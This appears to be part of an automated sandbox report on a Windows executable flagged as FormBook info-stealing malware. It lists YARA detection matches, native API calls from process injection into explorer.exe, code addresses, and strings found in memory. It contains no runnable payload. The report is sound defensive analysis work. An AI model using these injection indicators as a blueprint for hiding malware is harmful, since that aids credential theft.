          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:59:51 GMTContent-Type: text/htmlContent-Length: 505Connection: closeETag: "5f98d73b-1f9"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Windows\explorer.exeCode function: 2_2_074BBA32 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9E90 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9D5A NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9E8A NtClose,
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E97E8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E4E08
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E94E8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E4777
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057ED7F8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057ED7E7
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E97D8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E0007
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EF2A1
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EAD48
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EAD3F
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E4DF9
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EAFF8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D9F8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041E265
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DABE
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D3B5
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DC0A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D424
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DD64
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041E5DF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041E5E2
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D5FF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409E3B
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D720
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D7D4
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DFFC
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CFA6
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00402FB0
          Source: C:\Windows\explorer.exeCode function: 2_2_074BBA32
          Source: C:\Windows\explorer.exeCode function: 2_2_074BEB0E
          Source: C:\Windows\explorer.exeCode function: 2_2_074B6B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_074B6B22
          Source: C:\Windows\explorer.exeCode function: 2_2_074B9132
          Source: C:\Windows\explorer.exeCode function: 2_2_074B2069
          Source: C:\Windows\explorer.exeCode function: 2_2_074BEA6F
          Source: C:\Windows\explorer.exeCode function: 2_2_074BA862
          Source: C:\Windows\explorer.exeCode function: 2_2_074B2072
          Source: C:\Windows\explorer.exeCode function: 2_2_074B3CEC
          Source: C:\Windows\explorer.exeCode function: 2_2_074B3CF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05651D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05652D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05580D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056525DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564D466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05651FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565DFCE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A6E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564D616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05652EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565E824
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA830
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056528EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056520A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0562CB4F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05652B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056323E3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BABD8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564DBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056403DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B138B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BEBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563FA2B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056522AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BD9F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BE265
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDABE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDD64
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A2D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BE5DF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BE5E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDC0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BD420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCFA6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BD7BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDFFC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A9E3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A9E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0558B150 appears 136 times
          Source: zHgm9k7WYU.exeBinary or memory string: OriginalFilename vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000000.228278188.00000000005B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.261046059.0000000005170000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.254306135.00000000029E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTypeLibImporterFlags.dll4 vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.261473078.00000000054D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exeBinary or memory string: OriginalFilename vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.290950231.0000000000ED2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.297873498.000000000396E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exeBinary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
